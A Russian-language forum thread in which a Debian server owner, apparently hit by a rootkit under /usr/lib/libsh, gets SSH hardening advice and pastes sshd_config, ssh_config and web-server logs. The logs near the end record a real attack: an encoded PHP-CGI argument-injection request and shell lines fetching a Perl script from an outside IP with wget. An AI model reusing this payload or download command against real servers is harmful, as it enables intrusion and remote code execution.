Смена пароля ssh

passwd

В общем-то никак, слишком много способов оставить дырочку.

Какая ОС?

Никакие.

Debian 5.0.4

Могу только догадываться, что immutable флаг установлен, в дебиане кажется так можно убрать sudo chattr -R -i /path/to/dir

Пароль можно и подобрать... Посмотрите в сторону iptables, ограничьте доступ к своему серверу по ip

Пользовательские ключи лежат в ~/.ssh/authorized_keys. Его можно удалить.

В /etc/ssh/sshd_config можно указать, какие пользователи имеют право конектиться и с каких хостов. Пример:

user1 может конектиться по ssh с любого IP. root - только с 11.11.11.0/24, все остальные не могут.

(sudo) rm -rf /path

что пишет? посмотрите в dmesg тоже

 rm -rf /usr/lib/libsh

rm: cannot remove directory `/usr/lib/libsh/.backup': Operation not permitted

rm: cannot remove directory `/usr/lib/libsh/.sniff': Operation not permitted

rm: cannot remove `/usr/lib/libsh/hide': Operation not permitted

rm: cannot remove `/usr/lib/libsh/shsb': Operation not permitted

rm: cannot remove directory `/usr/lib/libsh/home': Operation not permitted

rm: cannot remove `/usr/lib/libsh/.bashrc': Operation not permitted

rm: cannot remove directory `/usr/lib/libsh/.owned': Operation not permitted

Отредактировал sshd_config, вот его нынешнее содержание:

# Package generated configuration file

# See the sshd(8) manpage for details



# What ports, IPs and protocols we listen for

Port 22

# Use these options to restrict which interfaces/protocols sshd will bind to

#ListenAddress ::

#ListenAddress 0.0.0.0

Protocol 2

# HostKeys for protocol version 2

HostKey /etc/ssh/ssh_host_rsa_key

HostKey /etc/ssh/ssh_host_dsa_key

#Privilege Separation is turned on for security

UsePrivilegeSeparation yes



# Lifetime and size of ephemeral version 1 server key

KeyRegenerationInterval 3600

ServerKeyBits 768



# Logging

SyslogFacility AUTH

LogLevel INFO

DenyUsers root@!188.162.220.0-188.162.235.255



# Authentication:

LoginGraceTime 120

PermitRootLogin yes

StrictModes yes



RSAAuthentication no

PubkeyAuthentication no

#AuthorizedKeysFile	%h/.ssh/authorized_keys



# Don't read the user's ~/.rhosts and ~/.shosts files

IgnoreRhosts yes

# For this to work you will also need host keys in /etc/ssh_known_hosts

RhostsRSAAuthentication no

# similar for protocol version 2

HostbasedAuthentication no

# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication

#IgnoreUserKnownHosts yes



# To enable empty passwords, change to yes (NOT RECOMMENDED)

PermitEmptyPasswords no



# Change to yes to enable challenge-response passwords (beware issues with

# some PAM modules and threads)

ChallengeResponseAuthentication no



# Change to no to disable tunnelled clear text passwords

#PasswordAuthentication yes



# Kerberos options

#KerberosAuthentication no

#KerberosGetAFSToken no

#KerberosOrLocalPasswd yes

#KerberosTicketCleanup yes



# GSSAPI options

#GSSAPIAuthentication no

#GSSAPICleanupCredentials yes



X11Forwarding no

X11DisplayOffset 10

PrintMotd no

PrintLastLog yes

TCPKeepAlive yes

#UseLogin no



#MaxStartups 10:30:60

#Banner /etc/issue.net



# Allow client to pass locale environment variables

AcceptEnv LANG LC_*



# Subsystem sftp /usr/lib/openssh/sftp-server



UsePAM no

ssh_config не трогал (я не трогал)

# This is the ssh client system-wide configuration file.  See

# ssh_config(5) for more information.  This file provides defaults for

# users, and the values can be changed in per-user configuration files

# or on the command line.



# Configuration data is parsed as follows:

#  1. command line options

#  2. user-specific file

#  3. system-wide file

# Any configuration value is only changed the first time it is set.

# Thus, host-specific definitions should be at the beginning of the

# configuration file, and defaults at the end.



# Site-wide defaults for some commonly used options.  For a comprehensive

# list of available options, their meanings and defaults, please see the

# ssh_config(5) man page.



Host *

#   ForwardAgent no

#   ForwardX11 no

#   ForwardX11Trusted yes

#   RhostsRSAAuthentication no

#   RSAAuthentication yes

#   PasswordAuthentication yes

#   HostbasedAuthentication no

#   GSSAPIAuthentication no

#   GSSAPIDelegateCredentials no

#   GSSAPIKeyExchange no

#   GSSAPITrustDNS no

#   BatchMode no

#   CheckHostIP yes

#   AddressFamily any

#   ConnectTimeout 0

#   StrictHostKeyChecking ask

#   IdentityFile ~/.ssh/identity

#   IdentityFile ~/.ssh/id_rsa

#   IdentityFile ~/.ssh/id_dsa

#   Port 22

#   Protocol 2,1

#   Cipher 3des

#   Ciphers aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc

#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160

#   EscapeChar ~

#   Tunnel no

#   TunnelDevice any:any

#   PermitLocalCommand no

    SendEnv LANG LC_*

    HashKnownHosts yes

    GSSAPIAuthentication yes

    GSSAPIDelegateCredentials no

Кстати, у меня сейчас настроен доступ с определённых IP и в панель и в ssh, если провайдер поменяет пул адресов (буквально в этом месяце уже менял), как я потом смогу изменить или удалить эту настройку?

Смена порта sshd убирает 99,9% попыток несанкционированного подключения.

Т.е. вместо Port 22 пишете что-нибудь вроде Port 1234.

На стандартный 22 постоянно долбятся какие-то боты-сканеры.

Если заходите под рутом, ещё больше секьюрности добавит создание клона рута с другим именем и отключение возможности логиниться непосредственно root.

Вот ещё какую фигню в логах нашел:

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] sh: line 1: 16726 Terminated              wget http://164.177.157.215/drupal/themes/bartik/images/log/-log/mc.pl

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] sh: curl: command not found

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] sh: fetch: command not found

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] sh: lwp-get: command not found

[Sun Nov 24 09:18:46 2013] [error] [client 58.20.178.174] Can't open perl script "mc.pl": No such file or directory

58.20.178.174 - - [24/Nov/2013:06:31:49 +0300] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 257 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25

Samail, ssh тут при чем?

michaek, просто что-бы тему новую не создавать написал здесь.